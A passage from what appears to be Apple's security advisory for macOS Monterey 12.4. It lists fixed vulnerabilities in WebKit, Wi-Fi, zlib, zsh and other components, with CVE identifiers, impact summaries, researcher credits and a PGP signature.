Available for: macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 238183  
CVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab  
WebKit Bugzilla: 238699  
CVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech

WebRTC  
Available for: macOS Monterey  
Impact: Video self-preview in a webRTC call may be interrupted if the  
user answers a phone call  
Description: A logic issue in the handling of concurrent media was  
addressed with improved state handling.  
WebKit Bugzilla: 237524  
CVE-2022-22677: an anonymous researcher

Wi-Fi  
Available for: macOS Monterey  
Impact: A malicious application may disclose restricted memory  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2022-26745: an anonymous researcher

Wi-Fi  
Available for: macOS Monterey  
Impact: An application may be able to execute arbitrary code with  
kernel privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26761: Wang Yu of Cyberserval

Wi-Fi  
Available for: macOS Monterey  
Impact: A malicious application may be able to execute arbitrary code  
with system privileges  
Description: A memory corruption issue was addressed with improved  
memory handling.  
CVE-2022-26762: Wang Yu of Cyberserval

zip  
Available for: macOS Monterey  
Impact: Processing a maliciously crafted file may lead to a denial of  
service  
Description: A denial of service issue was addressed with improved  
state handling.  
CVE-2022-0530

zlib  
Available for: macOS Monterey  
Impact: An attacker may be able to cause unexpected application  
termination or arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
CVE-2018-25032: Tavis Ormandy

zsh  
Available for: macOS Monterey  
Impact: A remote attacker may be able to cause arbitrary code  
execution  
Description: This issue was addressed by updating to zsh version  
5.8.1.  
CVE-2021-45444

Additional recognition

AppleMobileFileIntegrity  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

Bluetooth  
We would like to acknowledge Jann Horn of Project Zero for their  
assistance.

Calendar  
We would like to acknowledge Eugene Lim of Government Technology  
Agency of Singapore for their assistance.

FaceTime  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

FileVault  
We would like to acknowledge Benjamin Adolphi of Promon Germany GmbH  
for their assistance.

Login Window  
We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive  
Security for their assistance.

Photo Booth  
We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing  
for their assistance.

System Preferences  
We would like to acknowledge Mohammad Tausif Siddiqui  
(@toshsiddiqui), an anonymous researcher for their assistance.

WebKit  
We would like to acknowledge James Lee, an anonymous researcher for  
their assistance.

Wi-Fi  
We would like to acknowledge Dana Morrison for their assistance.

macOS Monterey 12.4 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmKC1TUACgkQeC9qKD1p  
rhigoQ//cTnC2MOYau+vO6pv8PHMbeEWPPvtsGpemCNz4iChXRhVOHKxgMQAHEgg  
Ejpxvw5D1jg12wroXypL8ADOD1V20OA7u5A20Lip1NIDL145692jPfmGuNxqkRnI  
DyoykhUogRL8Yvzkd5P8D3Jlo0EzCa4ZhO4tqBwbrGQZRb7gHclMPtzlgt15ZIma  
mH42QGRkJcK8v4MWNIxvibnQPwx3we2k4T8FajBvoCxYinMOlg/j16hFREj8Src+  
rQwKPV6JHiBBQ3LQpGeBlJrFLH72CyHbCu8IqWFYvvDXsT5Gr9JoagW7+g/9+8Wc  
402HjkY4wOZrxIBtlaUlNFZuB1mtIv8amHn9AaVOK/7GALSP6MQzA+U3HUqd3hYV  
J23pw6iRWBTZZSmO31kdEGU/X9uDkDKJL6QxUfzVXPVmOs0VNMmOJUdTRKf3tdsa  
5qnPcjowRONgltX8NqIP0q4aJPr1WigtFGyASIr3me/t9Ft7Kss4gJt7YLDsN6MZ  
opD8hTRHSAXAAYsA57omyo/DnmajHIbUGVEujzAh/DOEYxgT9aaaAHnkNuaQgIbs  
Z5g/dfhDaJodyk0q7BIeK+RPbkvrJvnoBWkRnAUaSgYMX14DQdExlBEvbpcPg71f  
LHzUlUewIuuP/57huTz/b4vEEke0JUwrWk6T1ACbndL3FsPIOX4=  
=jaCZ  
-----END PGP SIGNATURE-----

Tag

#apple